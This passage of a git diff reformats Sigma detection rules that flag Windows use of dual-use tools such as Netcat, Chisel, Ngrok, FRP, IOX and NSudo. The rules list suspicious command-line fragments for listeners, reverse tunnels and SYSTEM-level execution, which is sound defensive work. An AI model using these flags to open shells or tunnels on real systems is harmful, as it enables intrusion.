Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html @@ -25,11 +24,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \advanced_ip_scanner - - OriginalFileName|contains: advanced_ip_scanner - - Description|contains: Advanced IP Scanner + - NewProcessName|contains: \advanced_ip_scanner + - OriginalFileName|contains: advanced_ip_scanner # Covers also advanced_ip_scanner_console.exe + - Description|contains: Advanced IP Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml index 3cbc8d7e8..b20d2b473 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml @@ -19,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \advanced_port_scanner - - OriginalFileName|contains: advanced_port_scanner - - Description|contains: Advanced Port Scanner + - NewProcessName|contains: \advanced_port_scanner + - OriginalFileName|contains: advanced_port_scanner # Covers also advanced_port_scanner_console.exe + - Description|contains: Advanced Port Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml b/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml index 8663a68a4..a4a7a9cc3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml @@ -1,11 +1,10 @@ title: PUA - AdvancedRun Suspicious Execution id: fa00b701-44c6-4679-994d-5a18afa8a707 related: - - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 - type: similar + - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 + type: similar status: test -description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, - SYSTEM, Local Service or Network Service accounts +description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts references: - https://twitter.com/splinter_code/status/1483815103279603714 - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 @@ -26,20 +25,20 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /EXEFilename - /CommandLine selection_runas: - - CommandLine|contains: - - ' /RunAs 8 ' - - ' /RunAs 4 ' - - ' /RunAs 10 ' - - ' /RunAs 11 ' - - CommandLine|endswith: - - /RunAs 8 - - /RunAs 4 - - /RunAs 10 - - /RunAs 11 + - CommandLine|contains: + - ' /RunAs 8 ' + - ' /RunAs 4 ' + - ' /RunAs 10 ' + - ' /RunAs 11 ' + - CommandLine|endswith: + - /RunAs 8 + - /RunAs 4 + - /RunAs 10 + - /RunAs 11 condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml b/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml index c4f565ebc..9089c6e27 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml @@ -1,8 +1,8 @@ title: PUA - Chisel Tunneling Tool Execution id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 related: - - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf - type: similar + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar status: test description: Detects usage of the Chisel tunneling tool via the commandline arguments references: @@ -23,13 +23,13 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \chisel.exe + NewProcessName|endswith: \chisel.exe selection_param1: - CommandLine|contains: + CommandLine|contains: - 'exe client ' - 'exe server ' selection_param2: - CommandLine|contains: + CommandLine|contains: - -socks5 - -reverse - ' r:' diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml b/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml index 9930e2db6..a782dc535 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml @@ -18,18 +18,18 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName|endswith: \SepRemovalToolNative_x64.exe + NewProcessName|endswith: \SepRemovalToolNative_x64.exe selection2: - CommandLine|contains: --uninstall - NewProcessName|endswith: \CATClean.exe + CommandLine|contains: --uninstall + NewProcessName|endswith: \CATClean.exe selection3: - CommandLine|contains: -r - NewProcessName|endswith: \NetInstaller.exe + CommandLine|contains: -r + NewProcessName|endswith: \NetInstaller.exe selection4: - CommandLine|contains|all: + CommandLine|contains|all: - /uninstall - /enterprise - NewProcessName|endswith: \WFPUnins.exe + NewProcessName|endswith: \WFPUnins.exe condition: process_creation and (1 of selection*) falsepositives: - Legitimate administrative use (Should be investigated either way) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml b/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml index 0551b83a9..582105a11 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml @@ -1,8 +1,7 @@ title: PUA - Crassus Execution id: 2c32b543-1058-4808-91c6-5b31b8bed6c5 status: experimental -description: Detects Crassus, a Windows privilege escalation discovery tool, based - on PE metadata characteristics. +description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. references: - https://github.com/vu-ls/Crassus author: pH-T (Nextron Systems) @@ -18,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Crassus.exe - - OriginalFileName: Crassus.exe - - Description|contains: Crassus + - NewProcessName|endswith: \Crassus.exe + - OriginalFileName: Crassus.exe + - Description|contains: Crassus condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml b/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml index 50ca13bb3..e6e8b591f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml @@ -1,8 +1,7 @@ title: PUA - CsExec Execution id: d08a2711-ee8b-4323-bdec-b7d85e892b31 status: test -description: Detects the use of the lesser known remote execution tool named CsExec - a PsExec alternative +description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative references: - https://github.com/malcomvetter/CSExec - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \csexec.exe + NewProcessName|endswith: \csexec.exe selection_pe: Description: csexec condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml b/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml index 1b71c6eca..a8ad1b75a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml @@ -1,9 +1,7 @@ title: PUA - DefenderCheck Execution id: f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 status: test -description: Detects the use of DefenderCheck, a tool to evaluate the signatures used - in Microsoft Defender. It can be used to figure out the strings / byte chains - used in Microsoft Defender to detect a tool and thus used for AV evasion. +description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. references: - https://github.com/matterpreter/DefenderCheck author: Florian Roth (Nextron Systems) @@ -20,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \DefenderCheck.exe - - Description: DefenderCheck + - NewProcessName|endswith: \DefenderCheck.exe + - Description: DefenderCheck condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml b/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml index e9e0ca4a4..31757f126 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml @@ -1,8 +1,7 @@ title: PUA - DIT Snapshot Viewer id: d3b70aad-097e-409c-9df2-450f80dc476b status: test -description: Detects the use of Ditsnap tool, an inspection tool for Active Directory - database, ntds.dit. +description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. references: - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap @@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \ditsnap.exe - - CommandLine|contains: ditsnap.exe + - NewProcessName|endswith: \ditsnap.exe + - CommandLine|contains: ditsnap.exe condition: process_creation and selection falsepositives: - Legitimate admin usage diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml b/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml index 1a2a66db3..dcdeae0fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml @@ -1,8 +1,7 @@ title: PUA - Fast Reverse Proxy (FRP) Execution id: 32410e29-5f94-4568-b6a3-d91a8adad863 status: test -description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to - help you expose a local server behind a NAT or firewall to the Internet. +description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. references: - https://asec.ahnlab.com/en/38156/ - https://github.com/fatedier/frp @@ -20,19 +19,20 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \frpc.exe - \frps.exe selection_cli: - CommandLine|contains: \frpc.ini + CommandLine|contains: \frpc.ini selection_hashes: - - Hashes|contains: - - MD5=7D9C233B8C9E3F0EA290D2B84593C842 - - SHA1=06DDC9280E1F1810677935A2477012960905942F - - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C - - md5: 7d9c233b8c9e3f0ea290d2b84593c842 - - sha1: 06ddc9280e1f1810677935a2477012960905942f - - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c + # v0.44.0 + - Hashes|contains: + - MD5=7D9C233B8C9E3F0EA290D2B84593C842 + - SHA1=06DDC9280E1F1810677935A2477012960905942F + - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C + - md5: 7d9c233b8c9e3f0ea290d2b84593c842 + - sha1: 06ddc9280e1f1810677935a2477012960905942f + - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml b/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml index 614a059ab..a968537ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml @@ -1,8 +1,7 @@ title: PUA- IOX Tunneling Tool Execution id: d7654f02-e04b-4934-9838-65c46f187ebc status: test -description: Detects the use of IOX - a tool for port forwarding and intranet proxy - purposes +description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes references: - https://github.com/EddieIvan01/iox author: Florian Roth (Nextron Systems) @@ -19,21 +18,22 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \iox.exe + NewProcessName|endswith: \iox.exe selection_commandline: - CommandLine|contains: + CommandLine|contains: - '.exe fwd -l ' - '.exe fwd -r ' - '.exe proxy -l ' - '.exe proxy -r ' selection_hashes: - - Hashes|contains: - - MD5=9DB2D314DD3F704A02051EF5EA210993 - - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD - - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 - - md5: 9db2d314dd3f704a02051ef5ea210993 - - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd - - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 + # v0.4 + - Hashes|contains: + - MD5=9DB2D314DD3F704A02051EF5EA210993 + - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD + - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 + - md5: 9db2d314dd3f704a02051ef5ea210993 + - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd + - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 condition: process_creation and (1 of selection*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml b/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml index 02aab1d31..a3911e288 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml @@ -1,9 +1,7 @@ title: PUA - Netcat Suspicious Execution id: e31033fc-33f0-4020-9a16-faf9b31cbf08 status: test -description: Detects execution of Netcat. Adversaries may use a non-application layer - protocol for communication between host and C2 server or among infected hosts - within a network +description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md @@ -22,17 +20,20 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + # can not use OriginalFileName as is empty + NewProcessName|endswith: - \nc.exe - \ncat.exe - \netcat.exe selection_cmdline: - CommandLine|contains: + # Typical command lines + CommandLine|contains: - ' -lvp ' - ' -lvnp' - ' -l -v -p ' - ' -lv -p ' - ' -l --proxy-type http ' + # - ' --exec cmd.exe ' # Not specific enough for netcat - ' -vnl --exec ' - ' -vnl -e ' - ' --lua-exec ' diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml b/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml index 932e193bd..01fdd3528 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml @@ -1,12 +1,9 @@ title: PUA - Ngrok Execution id: ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31 status: test -description: 'Detects the use of Ngrok, a utility used for port forwarding and tunneling, - often used by threat actors to make local protected services publicly available. - +description: | + Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections. - - ' references: - https://ngrok.com/docs - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html @@ -29,26 +26,26 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - ' tcp 139' - ' tcp 445' - ' tcp 3389' - ' tcp 5985' - ' tcp 5986' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' start ' - --all - --config - .yml selection3: - CommandLine|contains: + CommandLine|contains: - ' tcp ' - ' http ' - ' authtoken ' - NewProcessName|endswith: ngrok.exe + NewProcessName|endswith: ngrok.exe selection4: - CommandLine|contains: + CommandLine|contains: - '.exe authtoken ' - .exe start --all condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml index d0ede0ad4..e459fac7e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml @@ -1,8 +1,7 @@ title: PUA - Nimgrab Execution id: 74a12f18-505c-4114-8d0b-8448dd5485c6 status: test -description: Detects the usage of nimgrab, a tool bundled with the Nim programming - framework and used for downloading files. +description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. references: - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md author: frack113 @@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_name: - NewProcessName|endswith: \nimgrab.exe + NewProcessName|endswith: \nimgrab.exe selection_hashes: Hashes|contains: - MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B - SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45 selection_hash: - - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B - - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 + - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B + - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 + - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use of Nim on a developer systems diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml index 3e4099fb3..22488b7be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml @@ -1,8 +1,7 @@ title: PUA - NirCmd Execution id: 4e2ed651-1906-4a59-a78a-18220fca1b22 status: test -description: Detects the use of NirCmd tool for command execution, which could be - the result of legitimate administrative activity +description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity references: - https://www.nirsoft.net/utils/nircmd.html - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -22,20 +21,20 @@ detection: EventID: 4688 Channel: Security selection_org: - - NewProcessName|endswith: \NirCmd.exe - - OriginalFileName: NirCmd.exe + - NewProcessName|endswith: \NirCmd.exe + - OriginalFileName: NirCmd.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' execmd ' - '.exe script ' - '.exe shexec ' - ' runinteractive ' combo_exec: - CommandLine|contains: + CommandLine|contains: - ' exec ' - ' exec2 ' combo_exec_params: - CommandLine|contains: + CommandLine|contains: - ' show ' - ' hide ' condition: process_creation and (1 of selection_* or all of combo_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml index c5077588e..ed00f19bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' runassystem ' + CommandLine|contains: ' runassystem ' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml index e1bbca97f..b893892bd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml @@ -1,9 +1,7 @@ title: PUA - Nmap/Zenmap Execution id: f6ecd1cf-19b8-4488-97f6-00f0924991a3 status: test -description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing - of services running on remote hosts, including those that may be vulnerable to - remote software exploitation +description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation references: - https://nmap.org/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows @@ -21,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \nmap.exe - - \zennmap.exe - - OriginalFileName: - - nmap.exe - - zennmap.exe + - NewProcessName|endswith: + - \nmap.exe + - \zennmap.exe + - OriginalFileName: + - nmap.exe + - zennmap.exe condition: process_creation and selection falsepositives: - Legitimate administrator activity diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml index bbbefeaaf..4ab624d66 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml @@ -1,8 +1,7 @@ title: PUA - NPS Tunneling Tool Execution id: 68d37776-61db-42f5-bf54-27e87072d17e status: test -description: Detects the use of NPS, a port forwarding and intranet penetration proxy - server +description: Detects the use of NPS, a port forwarding and intranet penetration proxy server references: - https://github.com/ehang-io/nps author: Florian Roth (Nextron Systems) @@ -19,22 +18,23 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \npc.exe + NewProcessName|endswith: \npc.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -server=' - ' -vkey=' - ' -password=' selection_cli_2: - CommandLine|contains: ' -config=npc' + CommandLine|contains: ' -config=npc' selection_hashes: - - Hashes|contains: - - MD5=AE8ACF66BFE3A44148964048B826D005 - - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181 - - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856 - - md5: ae8acf66bfe3a44148964048b826d005 - - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181 - - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856 + # v0.26.10 + - Hashes|contains: + - MD5=AE8ACF66BFE3A44148964048B826D005 + - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181 + - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856 + - md5: ae8acf66bfe3a44148964048b826d005 + - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181 + - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml index 79ec25aeb..e8cfa9383 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml @@ -20,22 +20,24 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \NSudo.exe - - \NSudoLC.exe - - \NSudoLG.exe - - OriginalFileName: - - NSudo.exe - - NSudoLC.exe - - NSudoLG.exe + - NewProcessName|endswith: + - \NSudo.exe + - \NSudoLC.exe + - \NSudoLG.exe + - OriginalFileName: + - NSudo.exe + - NSudoLC.exe + - NSudoLG.exe selection_cli: - CommandLine|contains: - - '-U:S ' - - '-U:T ' - - '-U:E ' - - '-P:E ' - - '-M:S ' - - '-M:H ' + CommandLine|contains: + # Covers Single/Double dash "-"/"--" + ":" + - '-U:S ' # System + - '-U:T ' # Trusted Installer + - '-U:E ' # Elevated + - '-P:E ' # Enable All Privileges + - '-M:S ' # System Integrity + - '-M:H ' # High Integrity + # Covers Single/Double dash "-"/"--" + "=" - '-U=S ' - '-U=T ' - '-U=E ' diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml index b1d287739..dc926e363 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml @@ -1,11 +1,10 @@ title: PUA - PingCastle Execution id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c related: - - id: b37998de-a70b-4f33-b219-ec36bf433dc0 - type: derived + - id: b37998de-a70b-4f33-b219-ec36bf433dc0 + type: derived status: experimental -description: Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level. +description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ @@ -27,162 +26,164 @@ detection: EventID: 4688 Channel: Security selection: - - Hashes|contains: - - MD5=f741f25ac909ee434e50812d436c73ff - - MD5=d40acbfc29ee24388262e3d8be16f622 - - MD5=01bb2c16fadb992fa66228cd02d45c60 - - MD5=9e1b18e62e42b5444fc55b51e640355b - - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 - - MD5=324579d717c9b9b8e71d0269d13f811f - - MD5=63257a1ddaf83cfa43fe24a3bc06c207 - - MD5=049e85963826b059c9bac273bb9c82ab - - MD5=ecb98b7b4d4427eb8221381154ff4cb2 - - MD5=faf87749ac790ec3a10dd069d10f9d63 - - MD5=f296dba5d21ad18e6990b1992aea8f83 - - MD5=93ba94355e794b6c6f98204cf39f7a11 - - MD5=a258ef593ac63155523a461ecc73bdba - - MD5=97000eb5d1653f1140ee3f47186463c4 - - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 - - MD5=32fe9f0d2630ac40ea29023920f20f49 - - MD5=a05930dde939cfd02677fc18bb2b7df5 - - MD5=124283924e86933ff9054a549d3a268b - - MD5=ceda6909b8573fdeb0351c6920225686 - - MD5=60ce120040f2cd311c810ae6f6bbc182 - - MD5=2f10cdc5b09100a260703a28eadd0ceb - - MD5=011d967028e797a4c16d547f7ba1463f - - MD5=2da9152c0970500c697c1c9b4a9e0360 - - MD5=b5ba72034b8f44d431f55275bace9f8b - - MD5=d6ed9101df0f24e27ff92ddab42dacca - - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d - - MD5=5e083cd0143ae95a6cb79b68c07ca573 - - MD5=28caff93748cb84be70486e79f04c2df - - MD5=9d4f12c30f9b500f896efd1800e4dd11 - - MD5=4586f7dd14271ad65a5fb696b393f4c0 - - MD5=86ba9dddbdf49215145b5bcd081d4011 - - MD5=9dce0a481343874ef9a36c9a825ef991 - - MD5=85890f62e231ad964b1fda7a674747ec - - MD5=599be548da6441d7fe3e9a1bb8cb0833 - - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 - - MD5=32d45718164205aec3e98e0223717d1d - - MD5=6ff5f373ee7f794cd17db50704d00ddb - - MD5=88efbdf41f0650f8f58a3053b0ca0459 - - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 - - MD5=781fa16511a595757154b4304d2dd350 - - MD5=5018ec39be0e296f4fc8c8575bfa8486 - - MD5=f4a84d6f1caf0875b50135423d04139f - - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b - - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 - - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d - - SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f - - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa - - SHA1=f14c9633040897d375e3069fddc71e859f283778 - - SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc - - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 - - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 - - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b - - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc - - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 - - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 - - SHA1=607e1fa810c799735221a609af3bfc405728c02d - - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 - - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a - - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 - - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 - - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 - - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 - - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea - - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 - - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 - - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad - - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 - - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 - - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 - - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a - - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db - - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 - - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 - - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 - - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c - - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d - - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 - - SHA1=c82152cddf9e5df49094686531872ecd545976db - - 